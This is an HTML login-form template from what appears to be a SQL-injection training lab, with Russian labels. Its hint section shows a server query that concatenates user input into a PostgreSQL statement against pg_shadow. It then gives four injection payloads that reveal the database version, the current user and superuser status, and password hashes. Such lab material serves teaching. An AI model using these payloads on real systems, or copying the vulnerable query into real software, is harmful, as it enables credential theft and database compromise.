{% extends 'base.html' %}

{% block body %}

<div class="container justify-content-center mt-5 card card-body">
<form method='post' action="{{ url_for('auth') }}">
  <div class="mb-3">
    <label for="exampleInputEmail1" class="form-label">Email</label>
    <input class="form-control" id="exampleInputEmail1" aria-describedby="emailHelp" name="email">
    <div id="emailHelp" class="form-text">
        {% with messages = get_flashed_messages() %}
            {% if messages %}
                {% for message in messages %}
                    {{ message }}
                {% endfor %}
            {% endif %}
        {% endwith %}
    </div>
  </div>
  <div class="mb-3">
    <label for="exampleInputPassword1" class="form-label">Пароль</label>
    <input type="password" class="form-control" id="exampleInputPassword1" name="password">
  </div>
  <div class="mb-3 form-check">
    <input type="checkbox" class="form-check-input" id="exampleCheck1">
    <label class="form-check-label" for="exampleCheck1">Check me out</label>
  </div>
  <input type='submit' value='Submit' class='btn btn-primary'>
</form>
</div>

<div class="container justify-content-center mt-5">
<p>
  <a class="btn btn-secondary" data-bs-toggle="collapse" href="#collapseExample" role="button" aria-expanded="false" aria-controls="collapseExample">
    Подсказка
  </a>
</p>
<div class="collapse" id="collapseExample">
  <div class="card card-body">
        <div>
            <h3>На сервере выполняется следующий запрос к БД:</h3>
            <p class='review'>SELECT EXISTS (SELECT * FROM pg_shadow WHERE usename = '" + login + "' AND passwd = '" + full_hash + "');</p>
        </div>
        <div>
            <h3>1. Узнать версию БД</h3>
            <i><p>Используется закрытие ковычек и комментарий в конце</p></i>
            <p class='review'>123')||(SELECT version());--</p>
            <i><p>Для объединения запросов используется ||</p></i>
        </div>
        <div>
            <h3>2. Узнать текущего пользователя БД</h3>
            <p class='review'>123')||(SELECT current_user);--</p>
        </div>
        <div>
            <h3>3. Является ли текущий пользователь суперпользователем</h3>
            <p class='review'>123')||(SELECT current_setting('is_superuser'));--</p>
        </div>
        <div>
            <h3>4. Получить логин и хэш пароля</h3>
            <p class='review'>123')||(SELECT passwd FROM pg_shadow WHERE usename = current_user);--</p>
            <i><p>Системная таблица pg_shadow хранит логины и хэши паролей</p></i>
        </div>
  </div>
</div>
</div>

{% endblock %}